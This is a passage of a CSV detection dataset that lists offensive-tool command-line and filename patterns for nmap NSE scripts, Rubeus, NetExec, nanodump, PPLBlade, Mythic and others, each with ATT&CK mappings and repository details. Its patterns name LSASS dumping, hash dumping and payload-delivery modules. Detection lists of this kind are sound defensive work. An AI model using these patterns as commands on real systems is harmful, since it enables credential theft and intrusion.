metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","0","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" +"* mikrotik-routeros-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mimikittenz*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* mmouse-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mmouse-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* modbus-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --mode decrypt --dumpname *.dmp --key *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* --mode dump --name *.exe --handle procexp --obfuscate*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* --mode dump --name lsass.exe*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* --mode proxy --ghidra *--dll *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"* mongodb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mongodb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mongodb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* monitor /interval:* /filteruser:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* moodlescan -r -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* mqtt-subscribe.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mrinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* MS15-034.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"* ms17010 -i *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"* ms17010 -n *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"* msfdb run *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"* --msfoptions *","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"* --msf-path*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* Mshikaki.cpp*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"* msrpc-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mssql * -u * -p * -M met_inject*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M mssql_priv*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M web_delivery *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ms-sql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-dac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-hasdbaccess.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ms-sql-xp-cmdshell.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mtrace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* murmur-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-audit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-empty-password.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-variables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mysql-vuln-cve2012-2122.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"* mythic start*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* mythic_container.Mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* mythic_payloadtype_container*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* -n *TotallyLegitTool*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" +"* --name covenant *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* nanodump/*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* nat-pmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nat-pmp-mapport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nbd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 